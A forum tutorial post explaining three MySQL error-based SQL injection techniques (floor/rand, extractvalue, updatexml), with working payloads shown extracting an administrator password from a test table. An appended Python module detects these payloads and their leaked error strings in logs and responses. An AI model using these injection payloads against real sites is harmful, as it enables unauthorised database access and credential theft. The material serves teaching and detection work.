中国网络渗透测试联盟
Title: Three error-based techniques in the MySQL injection process
Author: admin
Time: 2012-12-10 10:28
Posting some old notes. When MySQL executes a statement it throws exception messages, and sites built on php+mysql often display the error text on the page, so the following three methods can be constructed to retrieve specific data.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace the version() expression with the desired subquery.

For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
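As an added example (not code from the original post), the following Python helpers show the defender's side of the three error primitives above: they flag request URIs carrying the floor(rand(0)*2) GROUP BY, extractvalue() and updatexml() shapes, decode repeatedly so double URL-encoding cannot hide them, and recognise the leaked "Duplicate entry ... for key 'group_key'" and "XPATH syntax error" strings in response bodies. The access-log lines are constructed for this example and assume Apache/nginx Common Log Format; the function and pattern names are the example's own.

```python
"""Detection helpers for the three MySQL error-based injection primitives
described in the post (floor/rand GROUP BY, extractvalue, updatexml).

Added example: inspects request URIs for the payload shapes and response
bodies for the echoed MySQL error strings. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote_plus

# Request side: the function shapes used by the three techniques.
REQUEST_PATTERNS = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Response side: the MySQL error texts a site leaks when errors are displayed.
RESPONSE_PATTERNS = {
    "duplicate_group_key": re.compile(
        r"Duplicate entry '(?P<leak>[^']*)' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'"),
}

# Common Log Format (assumed for the constructed sample below).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+$')


def fully_decode(text, max_rounds=3):
    """URL-decode repeatedly so %2520-style double encoding cannot hide a payload."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(raw_uri):
    """Return the sorted names of error-based primitives present in a request URI."""
    decoded = fully_decode(raw_uri)
    return sorted(name for name, rx in REQUEST_PATTERNS.items() if rx.search(decoded))


def classify_response(body):
    """Return (pattern_name, leaked_value) for each MySQL error echoed in a response body."""
    hits = []
    for name, rx in RESPONSE_PATTERNS.items():
        m = rx.search(body)
        if m:
            hits.append((name, m.group("leak")))
    return hits


def scan_access_log(lines):
    """Return (ip, status, techniques) for every log line whose URI carries a payload."""
    alerts = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        techniques = classify_request(m.group("uri"))
        if techniques:
            alerts.append((m.group("ip"), int(m.group("status")), techniques))
    return alerts


# Constructed sample traffic: one benign request and one request per technique.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2012:10:28:01 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Dec/2012:10:28:05 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Dec/2012:10:28:09 +0800] "GET /article.php?id=1+and+extractvalue(1,'
    'concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 200 601',
    # the updatexml payload is double URL-encoded (%2520 -> %20 -> space)
    '198.51.100.7 - - [10/Dec/2012:10:28:13 +0800] "GET /article.php?id=1%2520and%25201%253D(updatexml(1,'
    'concat(0x5e24,(select%2520user()),0x5e24),1)) HTTP/1.1" 200 598',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
    print(classify_response(
        "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
```

Running the module prints one alert per injected request and the value recovered from the group_key error. Note that in the group_key case the final character of the leaked string is the 0 or 1 produced by floor(rand(0)*2), as in 'admin8881' above for the password admin888, so the matched value is one character longer than the data itself. The response-side check is the more useful signal in practice: a site that never echoes raw MySQL errors gives none of these three techniques anything to read.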
All, thanks foreign guys.

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2